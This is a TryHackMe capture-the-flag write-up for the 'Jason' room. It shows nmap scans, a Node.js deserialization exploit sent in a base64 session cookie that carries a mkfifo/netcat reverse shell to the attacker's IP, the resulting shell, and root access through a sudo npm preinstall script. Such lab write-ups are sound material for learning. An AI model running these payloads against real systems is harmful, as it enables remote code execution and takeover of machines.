TryHackMe - Jason

Introduction

This is a TryHackMe room which can be found at: Jason

In JavaScript everything is a terrible mistake.

Reconnaissance & Scanning

Perform nmap scan to identify open ports and services.

• Command: nmap -p- -T4 -v 10.10.121.122

geobour98@kali:~$ nmap -p- -T4 -v 10.10.121.122
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-31 19:39 EEST
Initiating Ping Scan at 19:39
Scanning 10.10.121.122 [2 ports]
Completed Ping Scan at 19:39, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:39
Completed Parallel DNS resolution of 1 host. at 19:39, 0.00s elapsed
Initiating Connect Scan at 19:39
Scanning 10.10.121.122 (10.10.121.122) [65535 ports]
Discovered open port 80/tcp on 10.10.121.122
Discovered open port 22/tcp on 10.10.121.122
Connect Scan Timing: About 42.14% done; ETC: 19:40 (0:00:43 remaining)
Completed Connect Scan at 19:40, 63.87s elapsed (65535 total ports)
Nmap scan report for 10.10.121.122 (10.10.121.122)
Host is up (0.068s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 63.97 seconds

Perform aggressive nmap scan to enable OS detection, default scripts and version detection on the found ports.

• Command: sudo nmap -A -sC -p 22,80 -v 10.10.121.122

geobour98@kali:~$ sudo nmap -A -sC -p 22,80 -v 10.10.121.122
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-31 19:41 EEST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Initiating Ping Scan at 19:41
Scanning 10.10.121.122 [4 ports]
Completed Ping Scan at 19:41, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:41
Completed Parallel DNS resolution of 1 host. at 19:41, 0.00s elapsed
Initiating SYN Stealth Scan at 19:41
Scanning 10.10.121.122 (10.10.121.122) [2 ports]
Discovered open port 22/tcp on 10.10.121.122
Discovered open port 80/tcp on 10.10.121.122
Completed SYN Stealth Scan at 19:41, 0.12s elapsed (2 total ports)
Initiating Service scan at 19:41
Scanning 2 services on 10.10.121.122 (10.10.121.122)
Completed Service scan at 19:41, 15.27s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.121.122 (10.10.121.122)
Retrying OS detection (try #2) against 10.10.121.122 (10.10.121.122)
Initiating Traceroute at 19:41
Completed Traceroute at 19:41, 0.07s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:41
Completed Parallel DNS resolution of 1 host. at 19:41, 0.00s elapsed
NSE: Script scanning 10.10.121.122.
Initiating NSE at 19:41
Completed NSE at 19:41, 3.53s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 0.14s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Nmap scan report for 10.10.121.122 (10.10.121.122)
Host is up (0.069s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5b:2d:9d:60:a7:45:de:7a:99:20:3e:42:94:ce:19:3c (RSA)
|   256 bf:32:78:01:83:af:78:5e:e7:fe:9c:83:4a:7d:aa:6b (ECDSA)
|_  256 12:ab:13:80:e5:ad:73:07:c8:48:d5:ca:7c:7d:e0:af (ED25519)
80/tcp open  http
|_http-favicon: Unknown favicon MD5: 8FCEA7DE73B9ED47DE799DB3AE6363A8
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Wed, 31 Aug 2022 16:41:22 GMT
|     Connection: close
|     <html><head>
|     <title>Horror LLC</title>
|     <style>
|     body {
|     background: linear-gradient(253deg, #4a040d, #3b0b54, #3a343b);
|     background-size: 300% 300%;
|     -webkit-animation: Background 10s ease infinite;
|     -moz-animation: Background 10s ease infinite;
|     animation: Background 10s ease infinite;
|     @-webkit-keyframes Background {
|     background-position: 0% 50%
|     background-position: 100% 50%
|     100% {
|     background-position: 0% 50%
|     @-moz-keyframes Background {
|     background-position: 0% 50%
|     background-position: 100% 50%
|     100% {
|     background-position: 0% 50%
|     @keyframes Background {
|     background-position: 0% 50%
|     background-posi
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Content-Type: text/html
|     Date: Wed, 31 Aug 2022 16:41:23 GMT
|     Connection: close
|     <html><head>
|     <title>Horror LLC</title>
|     <style>
|     body {
|     background: linear-gradient(253deg, #4a040d, #3b0b54, #3a343b);
|     background-size: 300% 300%;
|     -webkit-animation: Background 10s ease infinite;
|     -moz-animation: Background 10s ease infinite;
|     animation: Background 10s ease infinite;
|     @-webkit-keyframes Background {
|     background-position: 0% 50%
|     background-position: 100% 50%
|     100% {
|     background-position: 0% 50%
|     @-moz-keyframes Background {
|     background-position: 0% 50%
|     background-position: 100% 50%
|     100% {
|     background-position: 0% 50%
|     @keyframes Background {
|     background-position: 0% 50%
|_    background-posi
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Horror LLC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.92%I=7%D=8/31%Time=630F8F33%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,E4B,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/html\r\nDat
SF:e:\x20Wed,\x2031\x20Aug\x202022\x2016:41:22\x20GMT\r\nConnection:\x20cl
SF:ose\r\n\r\n<html><head>\n<title>Horror\x20LLC</title>\n<style>\n\x20\x2
SF:0body\x20{\n\x20\x20\x20\x20background:\x20linear-gradient\(253deg,\x20
SF:#4a040d,\x20#3b0b54,\x20#3a343b\);\n\x20\x20\x20\x20background-size:\x2
SF:0300%\x20300%;\n\x20\x20\x20\x20-webkit-animation:\x20Background\x2010s
SF:\x20ease\x20infinite;\n\x20\x20\x20\x20-moz-animation:\x20Background\x2
SF:010s\x20ease\x20infinite;\n\x20\x20\x20\x20animation:\x20Background\x20
SF:10s\x20ease\x20infinite;\n\x20\x20}\n\x20\x20\n\x20\x20@-webkit-keyfram
SF:es\x20Background\x20{\n\x20\x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20\x2
SF:0background-position:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x20
SF:50%\x20{\n\x20\x20\x20\x20\x20\x20background-position:\x20100%\x2050%\n
SF:\x20\x20\x20\x20}\n\x20\x20\x20\x20100%\x20{\n\x20\x20\x20\x20\x20\x20b
SF:ackground-position:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20}\n\x20\x2
SF:0\n\x20\x20@-moz-keyframes\x20Background\x20{\n\x20\x20\x20\x200%\x20{\
SF:n\x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20\x20\x2
SF:0\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x20\x20\x20\x20\x20background-po
SF:sition:\x20100%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x20100%\x20{\n\
SF:x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20\x20\x20\
SF:x20}\n\x20\x20}\n\x20\x20\n\x20\x20@keyframes\x20Background\x20{\n\x20\
SF:x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20\x20background-position:\x200%\
SF:x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x20\x20\x20\x
SF:20\x20background-posi")%r(HTTPOptions,E4B,"HTTP/1\.1\x20200\x20OK\r\nCo
SF:ntent-Type:\x20text/html\r\nDate:\x20Wed,\x2031\x20Aug\x202022\x2016:41
SF::23\x20GMT\r\nConnection:\x20close\r\n\r\n<html><head>\n<title>Horror\x
SF:20LLC</title>\n<style>\n\x20\x20body\x20{\n\x20\x20\x20\x20background:\
SF:x20linear-gradient\(253deg,\x20#4a040d,\x20#3b0b54,\x20#3a343b\);\n\x20
SF:\x20\x20\x20background-size:\x20300%\x20300%;\n\x20\x20\x20\x20-webkit-
SF:animation:\x20Background\x2010s\x20ease\x20infinite;\n\x20\x20\x20\x20-
SF:moz-animation:\x20Background\x2010s\x20ease\x20infinite;\n\x20\x20\x20\
SF:x20animation:\x20Background\x2010s\x20ease\x20infinite;\n\x20\x20}\n\x2
SF:0\x20\n\x20\x20@-webkit-keyframes\x20Background\x20{\n\x20\x20\x20\x200
SF:%\x20{\n\x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20
SF:\x20\x20\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x20\x20\x20\x20\x20backgr
SF:ound-position:\x20100%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x20100%\
SF:x20{\n\x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20\x
SF:20\x20\x20}\n\x20\x20}\n\x20\x20\n\x20\x20@-moz-keyframes\x20Background
SF:\x20{\n\x20\x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20\x20background-posi
SF:tion:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x
SF:20\x20\x20\x20\x20background-position:\x20100%\x2050%\n\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20100%\x20{\n\x20\x20\x20\x20\x20\x20background-positi
SF:on:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20}\n\x20\x20\n\x20\x20@keyf
SF:rames\x20Background\x20{\n\x20\x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20
SF:\x20background-position:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\
SF:x2050%\x20{\n\x20\x20\x20\x20\x20\x20background-posi");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 24.723 days (since Sun Aug  7 02:20:54 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   69.85 ms 10.8.0.1 (10.8.0.1)
2   68.05 ms 10.10.121.122 (10.10.121.122)

NSE: Script Post-scanning.
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.71 seconds
           Raw packets sent: 75 (5.900KB) | Rcvd: 57 (4.656KB)

Navigate to port 80, in the Email address field put test@test.com, open Burp Suite and Intercept the request. Then send it to Repeater.

The request should look like this:

POST /?email=test@test.com HTTP/1.1
Host: 10.10.121.122
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://10.10.121.122
Connection: close
Referer: http://10.10.121.122/
Content-Length: 0

Click the Send button and notice the response:

HTTP/1.1 200 OK
Set-Cookie: session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ==; Max-Age=900000; HttpOnly, Secure
Content-Type: text/html
Date: Wed, 31 Aug 2022 16:48:27 GMT
Connection: close
Content-Length: 3559

[REDACTED]

In the Set-Cookie header if we decode the session value from base64 we identify a serialized object.

• Command: echo -n "eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ==" | base64 -d

geobour98@kali:~$ echo -n "eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ==" | base64 -d
{"email":"test@test.com"}

Exploitation

Go in Decoder in Burp Suite and craft a serialized object like this:

{"email":"_$$ND_FUNC$$_function (){require('child_process').exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.200.50 443 >/tmp/f\", function(error, stdout, stderr) { console.log(stdout) });}()"}

Click on Encode as and select Base64 so the output should look like this:

eyJlbWFpbCI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbiAoKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYyhcInJtIC90bXAvZjtta2ZpZm8gL3RtcC9mO2NhdCAvdG1wL2Z8L2Jpbi9zaCAtaSAyPiYxfG5jIDEwLjguMjAwLjUwIDQ0MyA+L3RtcC9mXCIsIGZ1bmN0aW9uKGVycm9yLCBzdGRvdXQsIHN0ZGVycikgeyBjb25zb2xlLmxvZyhzdGRvdXQpIH0pO30oKSJ9

Next, go to http://10.10.121.122, refresh the page, Intercept the request, add a Cookie header with the base64 encoded value into the session.

The request should look like this:

GET / HTTP/1.1
Host: 10.10.121.122
Cookie: session=eyJlbWFpbCI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbiAoKXtyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYyhcInJtIC90bXAvZjtta2ZpZm8gL3RtcC9mO2NhdCAvdG1wL2Z8L2Jpbi9zaCAtaSAyPiYxfG5jIDEwLjguMjAwLjUwIDQ0MyA+L3RtcC9mXCIsIGZ1bmN0aW9uKGVycm9yLCBzdGRvdXQsIHN0ZGVycikgeyBjb25zb2xlLmxvZyhzdGRvdXQpIH0pO30oKSJ9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Open a netcat listener and click Forward and we get a reverse shell as dylan

geobour98@kali:~$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.8.200.50] from (UNKNOWN) [10.10.121.122] 53470
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
dylan@jason:/opt/webapp$ whoami
whoami
dylan
dylan@jason:/opt/webapp$

The server performed deserialization of the Cookie header so the reverse shell was executed. The payload used can be found in this great article: Exploiting Node.js deserialization bug for Remote Code Execution, which is about Node.js deserialization as in our case.

We can also read the user.txt flag:

dylan@jason:/opt/webapp$ cd /home/dylan
cd /home/dylan
dylan@jason:~$ cat user.txt
cat user.txt
[REDACTED]

Privilege Escalation

After executing the command: sudo -l we see that we can execute npm without being asked for root password.

dylan@jason:~$ sudo -l
sudo -l
Matching Defaults entries for dylan on jason:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dylan may run the following commands on jason:
    (ALL) NOPASSWD: /usr/bin/npm *

A great exploit for this can be found on: GTFObins npm

dylan@jason:~$ TF=$(mktemp -d)
dylan@jason:~$ echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
dylan@jason:~$ sudo npm -C $TF --unsafe-perm i
sudo npm -C $TF --unsafe-perm i

> @ preinstall /tmp/tmp.DaaEyPR9DZ
> /bin/sh

# bash
bash
root@jason:/tmp/tmp.DaaEyPR9DZ# id
id
uid=0(root) gid=0(root) groups=0(root)
root@jason:/tmp/tmp.DaaEyPR9DZ# cd /root
cd /root
root@jason:~# cat root.txt
cat root.txt
[REDACTED]

Proof of Concept (PoC image):